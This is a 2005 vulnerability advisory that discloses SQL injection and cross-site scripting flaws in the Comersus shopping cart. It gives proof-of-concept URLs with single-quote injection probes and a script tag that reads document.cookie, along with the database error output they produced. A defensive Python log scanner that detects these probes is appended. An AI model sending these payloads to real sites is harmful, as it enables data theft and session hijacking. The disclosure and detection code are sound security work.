Dcrab 's Security Advisory
http://www.dbtech.org
Deadbolt Computer Technologies

******************************
SPECIAL BIRTHDAY RELEASE, 18TH BIRTHDAY RELEASE FOR DIABOLIC CRAB, YOU CAN SEND EMAILS TO DCRAB@HACKERSCENTER.COM
******************************

Get Dcrab's Services to audit your Web servers, scripts, networks, etc or even code them. Learn more at http://www.dbtech.org

Severity: High
Title: [Bday Release] Comersus shopping cart has multiple Sql injection and Cross Site Scripting vulnerabilities
Date: 8/07/2005

Vendor: Comersus
Vendor Website: http://www.comersus.com
Vendor Status: Contacted but no reply
Summary: There are multiple sql injection and cross site scripting vulnerabilities in Comersus Shopping Cart

Proof of Concept Exploits:

www.comersus.com/comersus6/store/comersus_optAffiliateRegistrationExec.asp?name=1&email='&Submit=Join%20now%21
SQL INJECTION

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC Microsoft Access Driver] Syntax error in string in query expression 'idProduct=''.
/comersus6/includes/databaseFunctions.asp, line 39

http://www.comersus.com/comersus6/store/comersus_optReviewReadExec.asp?idProduct='&description=Dr%252E%2BSolomon%2560s%2BVirex%2B6%252E0%2B%2528For%2BMacintosh%2529
SQL INJECTION

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC Microsoft Access Driver] Syntax error in string in query expression 'idProduct=''.
/comersus6/includes/databaseFunctions.asp, line 39

www.comersus.com/backofficetest/backOfficePlus/comersus_backoffice_listAssignedPricesToCustomer.asp?idCustomer=7&name=><script>alert(document.cookie);</script>
Cross Site Scripting

www.comersus.com/backofficetest/backOfficePlus/comersus_backoffice_message.asp?message=>
Cross Site Scripting

Keep yourself updated, Rss feed at: http://digitalparadox.org/rss.ah and at http://www.hackerscenter.com

Author:
These vulnerabilities have been found and released by Diabolic Crab, Email: dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com, please feel free to contact me regarding these vulnerabilities. You can find me at, http://www.hackerscenter.com or http://www.dbtech.org/. Lookout for my soon to come out book on Secure coding with php.

--------------------------------------------------------------------------------

Sincerely,
Diabolic Crab
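As an added defender-side example that is not part of this advisory: a Python scan over IIS-style web server log lines that flags the probes shown above (a bare single quote in a parameter next to the 500 that the ODBC syntax error produces, and a script tag in a parameter), and that keeps decoding the double-encoded description parameter the second PoC uses so one pass of decoding cannot hide a payload. The log lines, client IPs and simplified field layout are constructed for the example.

```python
import re
from urllib.parse import parse_qsl, unquote

# Constructed log excerpt in a simplified IIS W3C layout (date time c-ip
# cs-method cs-uri-stem cs-uri-query sc-status); not real traffic. Lines 1-3
# replay the advisory's three probes, line 4 is an ordinary request.
SAMPLE_LOG = """\
2005-07-08 10:00:01 10.0.0.5 GET /comersus6/store/comersus_optReviewReadExec.asp idProduct='&description=Dr%252E%2BSolomon%2560s%2BVirex 500
2005-07-08 10:00:02 10.0.0.5 GET /comersus6/store/comersus_optAffiliateRegistrationExec.asp name=1&email='&Submit=Join%20now%21 500
2005-07-08 10:00:03 10.0.0.5 GET /backofficetest/backOfficePlus/comersus_backoffice_listAssignedPricesToCustomer.asp idCustomer=7&name=%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E 200
2005-07-08 10:00:04 10.0.0.9 GET /comersus6/store/comersus_optReviewReadExec.asp idProduct=42&description=Virex 200
"""

SQLI_RE = re.compile(r"'")  # the advisory's probe is a bare single quote
XSS_RE = re.compile(r"<\s*/?\s*script\b|javascript:", re.IGNORECASE)

def full_decode(value, max_rounds=3):
    """Percent-decode until stable: the advisory's description parameter is
    double-encoded (%252E -> %2E -> '.'), so a single pass would miss it."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def inspect_request(stem, query, status):
    """Return (stem, param, kind, status) for each suspicious parameter."""
    findings = []
    if query == "-":  # IIS logs '-' when the query string is empty
        return findings
    for param, raw in parse_qsl(query, keep_blank_values=True):
        value = full_decode(raw)  # parse_qsl decodes once; this finishes
        if SQLI_RE.search(value):
            findings.append((stem, param, "sqli", status))
        elif XSS_RE.search(value):
            findings.append((stem, param, "xss", status))
    return findings

def scan_log(text):
    """Collect findings over a whole log; a quoted parameter paired with a
    500 is the ODBC syntax-error page the advisory reproduces."""
    results = []
    for line in text.splitlines():
        if line.strip():
            _d, _t, _ip, _m, stem, query, status = line.split()
            results.extend(inspect_request(stem, query, int(status)))
    return results
```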